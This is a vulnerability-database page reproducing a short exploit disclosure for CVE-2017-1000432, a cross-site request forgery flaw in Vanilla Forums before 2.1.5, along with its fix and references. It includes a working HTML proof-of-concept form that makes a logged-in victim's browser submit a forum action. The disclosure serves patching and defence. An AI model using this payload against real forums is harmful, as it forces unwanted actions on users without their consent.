Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Vanilla < 2.1.5 - Cross-Site Request Forgery Vulnerability

🗓️ 08 Jan 2018 00:00:00Reported by Anand MeyyappanType 
zdt
 zdt🔗 0day.today👁 54 Views

Vanilla Forums < 2.1.5 CSRF Vulnerability allows registered users to delete topics and comments without admin access. Update to version 2.5 to fix

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Linux Kernel - The Huge Dirty Cow Overwriting The Huge Zero Page Exploit
1 Dec 201700:00
zdt
0day.today		glibc ld.so - Memory Leak / Buffer Overflow Vulnerability
14 Dec 201700:00
zdt
0day.today		b2evolution CMS 6.8.10 PHP Code Execution Vulnerability
3 Jan 201800:00
zdt
0day.today		Primefaces 5.x - Remote Code Execution Exploit
18 Jan 201800:00
zdt
0day.today		Linux Kernel - The Huge Dirty Cow Overwriting The Huge Zero Page (2) Exploit
20 Mar 201800:00
zdt
0day.today		Vehicle Sales Management System - Multiple Vulnerabilities
20 Mar 201800:00
zdt
0day.today		phpMyAdmin 4.7.x - Cross-Site Request Forgery Vulnerability
29 Aug 201800:00
zdt
Atlassian		Code Injection and Directory Traversal in plexus-utils
25 Jan 202104:06
atlassian
BDU FSTEC		The vulnerability of the Solaris component (a kernel subsystem of the operating system) allows a attacker to gain access to all resources of the operating system.
18 Aug 201700:00
bdu_fstec
BDU FSTEC		The vulnerability of the Kernel component of the Solaris operating system, which allows a hacker to gain control over the system
15 Sep 201700:00
bdu_fstec
Rows per page
# Exploit Title: CSRF vulnerabilities in Vanilla Forums below 2.1.5-CVE-2017-1000432
# Google Dork: NA
# Date: 7/1/2018
# Contact: https://twitter.com/anandm47
#   website: https://anandtechzone.blogspot.in <https://t.co/MJ8SoRaIMn>
# Exploit Author: Anand Meyyappan
# Vendor Homepage: https://open.vanillaforums.com <https://open.vanillaforums.com/discussion/28337/vanilla-2-1-5-released-and-2-0-18-14>
# Software Link: https://open.vanillaforums.com/addon/vanilla-core-2.1
# Tested on: Windows, Linux
# CVE : CVE-2017-1000432
 
Description
 
 
Any registered user can delete topics and comments in forum without having admin access.
 
 
 
2.Proof Of Concept
 
 
 
Save the below code in html format, Once victim is logged into account. Use the below code.
 
<form method="post" action="https://www.site.com/forum/vanilla/discussion/dismissannouncement?discussionid=3709"> 
<input name=" DeliveryType" value="VIEW" class="input" type="hidden"> 
<input name=" DeliveryMethod" value="JSON" class="input" type="hidden"> <li>
<label><br></label><input value="Send" class="submit" type="submit"></li> </ul> 
</form>
 
3. Solution:
 
 
Update to version 2.5
 
https://open.vanillaforums.com/get/vanilla-core-2.5
 
 
 
#Reference
 
https://open.vanillaforums.com/discussion/28337/vanilla-2-1-5-released-and-2-0-18-14
https://www.cvedetails.com/cve/CVE-2017-1000432/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000432

#  0day.today [2018-04-09]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Jan 2018 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.00238
vanilla forumscsrf vulnerabilityregistered usersdelete topicsdelete commentsadmin accessupdateversion 2.5cve-2017-1000432security issue
54